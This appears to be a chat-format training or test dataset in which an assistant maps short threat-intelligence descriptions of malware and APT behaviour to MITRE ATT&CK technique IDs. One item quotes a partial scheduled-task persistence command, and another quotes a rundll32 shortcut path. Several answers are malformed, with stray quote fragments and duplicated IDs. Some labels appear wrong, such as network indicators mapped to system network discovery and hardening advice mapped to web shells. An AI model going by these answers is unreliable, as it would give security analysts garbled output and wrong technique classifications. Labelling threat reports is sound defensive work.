- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "f) Hadoop YARN ResourceManager – Command Execution (exploit) g) CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution', 'T1203 - Exploitation for Client Execution', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuTo Stealer can use HTTP to communicate with its C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "captures window titles."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery', 'T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can create or add files to Registry Run Keys to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "allows adversaries to enumerate and modify the infected host's file system. It supports searching for directories, creating directories, listing directory contents, reading and writing to files, retrieving file attributes, and retrieving volume information."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It uses the legitimate Naver email platform in order to communicate with the attackers via email"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload contains an exploit for the unpatched local privilege escalation vulnerability CVE-2015-1701 in Microsoft Windows. The exploit uses CVE-2015-1701 to execute a callback in userspace. The callback gets the EPROCESS structures of the current process and the System process, and copies data from the System token into the token of the current process. Upon completion, the payload continues execution in usermode with the privileges of the System process"
- },
- {
- "role": "assistant",
- "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell can kill AV products' processes."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The reason for this is that most of the file comprises meaningless overlay data, since the file is an automatically generated AutoIT executable with an AutoIT3 script embedded inside. Once started, it downloads additional malware from the C2 and also uploads some basic system information, stealing, among other things, the user’s Google Chrome credentials. The backdoor also pings the C2 server at regular intervals. A good security analyst can spot this while analyzing firewall log files and thereby find out that something suspicious might be going on in the network"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body has established persistence via the Startup folder or Run Registry key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ComRAT has used PowerShell to load itself every time a user logs in to the system. ComRAT can execute PowerShell scripts loaded into memory or from the file system."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation', 'T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this wave of attacks, Emotet trojan spreads by emails that lure victims into downloading a Christmas-themed Word document, which contains a macro that executes a PowerShell script to download a malicious payload. Commands in the macro are heavily obfuscated for defense evasion"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can collect operating system (OS) version information, processor information, system name, and information about installed disks from the victim."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used IronPython scripts as part of the IronNetInjector toolchain to drop payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHBUGGY has used PowerShell scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Squirrelwaffle has encrypted collected data using a XOR-based algorithm."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hikit performs XOR encryption."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ferocious Kitten has conducted spearphishing campaigns containing malicious documents to lure victims to open the attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Cobalt Strike System Profiler can use JavaScript to perform reconnaissance actions."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Speaking on the vulnerability leveraged by this attack, while we spotted the attack performed via Office 2007 running on Windows XP, this is actually a fault existing in a TIFF-processing component shipped with Microsoft Office. Therefore, not only are Office 2007 with Windows XP vulnerable to this attack, but also more environments are affected by this vulnerability. In addition, our later research showed this exploit also works on Office 2007 running on Windows 7. The Labs has been actively working on getting every piece of details of this exploit, we may share our additional findings in the near future"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The loader will then inject a DLL backdoor into dllhost.exe"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sibot executes commands using VBScript."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerLess can stage stolen browser data in `C:\\\\Windows\\\\Temp\\\\cup.tmp` and keylogger data in `C:\\\\Windows\\\\Temp\\\\Report.06E17A5A-7325-4325-8E5D-E172EBA7FC5BK`."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IcedID uses TLS in all of its communication but the certificate is self-signed. They can be spotted, as they use this kind of a self-signed certificate. The keyword “Internet Widgits Pty Ltd” is also being used by Trickbot, another banking malware, and it is believed that Trickbot and IcedID are cousins"
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography', 'T1185 - Browser Session Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHBUGGY has Gzipped information and saved it to a random temp file before exfil."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete uses HTTP for Command & Control."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Network Indicators Hostname IP Address Notes mailcenter.support 221.121.138.139 Domain used to for sending spear phishes and user tracking"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has used stolen code signing certificates to sign malware."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has established persistence through a scheduled task using the command: \" /Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR \", named \"WinUpdate\"."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has routed traffic over Tor and VPN servers to obfuscate their activities."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has placed trojanized installers for control system software on legitimate vendor app stores."
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "downloads and executes PowerShell scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kevin can use a custom protocol tunneled through DNS or HTTP."
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has deleted files associated with their payload after execution."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN5 has used the open source tool Essential NetTools to map the network and build a list of targets."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can gather a list of running processes by using Tasklist."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kobalos can record the hostname and kernel version of the target machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ixeshe can list running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar's loader can delete scheduled tasks created by a previous instance of the malware."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host', 'T1070.009 - Clear Persistence"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exaramel for Linux can decrypt its configuration file."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Melcoz has been packed with VMProtect and Themida."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rover has keylogging functionality."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has scanned network infrastructure for vulnerabilities as part of its operational planning."
- },
- {
- "role": "assistant",
- "content": "T1595.002 - Vulnerability Scanning"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee has relied upon a user opening an ISO file to enable execution of malicious shortcut files and DLLs."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This shortcut file points to ‘C:\\Windows\\system32\\rundll32.exe “%APPDATA%\\cnagnt.dll”,Sd’ One of the exceptions to the installation routine above is in the event Symantec is detected"
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kobalos can write captured SSH connection credentials to a file under the \"/var/run\" directory with a \".pid\" extension for exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used \"net localgroup administrators\" to find local administrators on compromised systems."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this latest discovery by McAfee ATR, despite a short pause in similar operations, the Lazarus group targets crypto currency and financial organizations. Furthermore, we have observed an increased usage of limited data gathering modules to quickly identify targets for further attacks. This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "They should also take the following steps to harden both web applications and the servers hosting them to reduce the risk of network intrusion via this vector.Use and configure available firewalls to block attacks.Take steps to secure Windows systems, such as installing and configuring Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) and Microsoft AppLocker.Monitor and remove any unauthorized code present in any www directories.Disable, discontinue, or disallow the use of Internet Control Message Protocol (ICMP) and Simple Network Management Protocol (SNMP) as much as possible.Remove unnecessary HTTP verbs from web servers"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CaddyWiper has the ability to dynamically resolve and use APIs, including `SeTakeOwnershipPrivilege`."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In these websites they hosted malware that was digitally signed with a valid, likely stolen code signing certificate Based on VirusTotal uploads, malicious documents content, and known victims – other targeted organisations are located in Turkey, Qatar, Kuwait, United Arab Emirates, Saudi Arabia, and Lebanon"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can list all files on a system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla exploits CVE-2017-11882 in Microsoft’s Equation Editor to execute a process."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors communicated with C2 via an encrypted RC4 byte stream and AES-CBC."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 used weaponized Microsoft Word documents abusing the remote template function to retrieve a malicious macro."
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Run commands on Windows system remotely using Winexe: Winexe is a GNU/Linux-based application that allows users to execute commands remotely on WindowsNT/2000/XP/2003/Vista/7/8 systems. It installs a service on the remote system, executes the command, and uninstalls the service. Winexe allows execution of most of the windows shell commands"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this wave of attacks, Emotet trojan spreads by emails that lure victims into downloading a Christmas-themed Word document, which contains a macro that executes a PowerShell script to download a malicious payload"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remcos has a command for UAC bypassing."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet artifacts are typically found in arbitrary paths located off of the AppData\\Local and AppData\\Roaming directories. Persistence is typically maintained through Scheduled Tasks or via registry keys. Additionally, Emotet creates randomly-named files in the system root directories that are run as Windows services"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses cmd.exe to execute scripts and commands on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has set up Facebook pages in tandem with fake websites."
- },
- {
- "role": "assistant",
- "content": "T1585.001 - Social Media Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Word document has a malicious macro in it and, when opened by the victim, it will drop and execute a file in a specific folder"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. This file is sent as an attachment to the attacker’s email address. Later variants upload the file to a web server via an HTTP post command. The type of data this implant gathers from the victim’s system"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery', 'T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer also checks for the presence of following device drivers, DLLs, and virtual devices. If any of these objects are detected, the malware enters an infinite loop, stopping its execution from going further"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Apart from targeting Gmail users, Pawn Storm has also abused OAuth in credential phishing attacks against high profile Yahoo users. Here is an example from 2015 where “McAfee Email Protection” is offered"
- },
- {
- "role": "assistant",
- "content": "T1528 - Steal Application Access Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lokibot has used process hollowing to inject itself into legitimate Windows process."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS encodes C2 traffic with base64."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This attack diverged from previous attacks we observed from this group as it involved spear-phishing emails sent to targeted organizations with password protected RAR archive attachments that contained malicious Excel Web Query files (.iqy)"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has installed TeamViewer on targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
